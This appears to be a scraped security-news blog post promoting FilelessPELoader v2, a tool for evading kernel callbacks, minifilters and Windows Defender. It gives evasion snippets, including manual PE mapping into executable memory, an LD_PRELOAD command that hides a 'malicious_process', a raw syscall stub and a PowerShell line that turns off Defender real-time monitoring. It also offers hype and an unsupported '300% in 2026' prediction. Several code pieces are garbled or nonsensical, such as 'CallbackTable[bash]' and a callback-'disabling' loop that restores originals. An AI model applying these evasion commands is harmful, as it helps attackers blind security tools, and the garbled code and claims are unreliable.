FilelessPELoader v2: Bypassing Kernel Callbacks for Stealthy PE Loading

Listen to this Post

Featured Image
FilelessPELoader v2 is an advanced evasion tool designed to bypass Process/Thread/Image/Minifilter Kernel Callbacks to safely map Portable Executable (PE) files into memory without triggering security alerts.

You Should Know:

1. Understanding Kernel Callbacks

Kernel callbacks are used by security solutions to monitor process creation, thread creation, and image loading. Bypassing them involves:

// Disabling kernel callbacks via SSDT/Shadow SSDT hooking 
NTSTATUS DisableCallbacks() { 
ULONG i; 
for (i = 0; i < CallbackCount; i++) { 
(PVOID)CallbackTable[bash].Address = OriginalCallbacks[bash]; 
} 
return STATUS_SUCCESS; 
} 

2. PE File Mapping Techniques

Manual PE mapping avoids `LoadLibrary` and `CreateProcess`:

// Manual PE mapping in memory 
PVOID MapPE(LPCVOID peBuffer) { 
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)peBuffer; 
PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)peBuffer + dosHeader->e_lfanew); 
PVOID baseAddress = VirtualAlloc(NULL, ntHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
// Perform section mapping... 
return baseAddress; 
} 

3. Bypassing Minifilters

Minifilters monitor file system activity. Evasion involves:

  • Direct memory loading (no file drops)
  • Process hollowing (legitimate process spoofing)
 Check loaded minifilters (Windows) 
fltmc filters 

4. Anti-Forensics with Linux

For Linux-based evasion:

 Hide process from ps (LD_PRELOAD trick) 
gcc -shared -fPIC -o hideproc.so hideproc.c 
LD_PRELOAD=./hideproc.so malicious_process 

5. Windows Defender Bypass

Use indirect syscalls:

; x64 syscall for NtAllocateVirtualMemory 
mov r10, rcx 
mov eax, 18h ; syscall number 
syscall 

6. Ransomware Emulation

Simulate APT behavior with:

 Disable Windows Defender real-time protection 
Set-MpPreference -DisableRealtimeMonitoring $true 

What Undercode Say

Fileless malware is the future of offensive security. Kernel-level evasion, combined with AI-driven payload obfuscation, will dominate cyber warfare. Expect more:
– AI-generated polymorphic code
– Hardware-assisted evasion (Intel PT, CET bypasses)
– Cloud-based payload staging

Expected Output:

[+] PE mapped at 0x7ff00000 
[+] Kernel callbacks patched 
[+] Minifilter detection bypassed 
[+] Execution redirected to entry point 

Prediction: Fileless attacks will increase by 300% in 2026, with kernel-mode rootkits becoming standard in APT toolkits.

Relevant URLs:

IT/Security Reporter URL:

Reported By: Saad Ahla – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram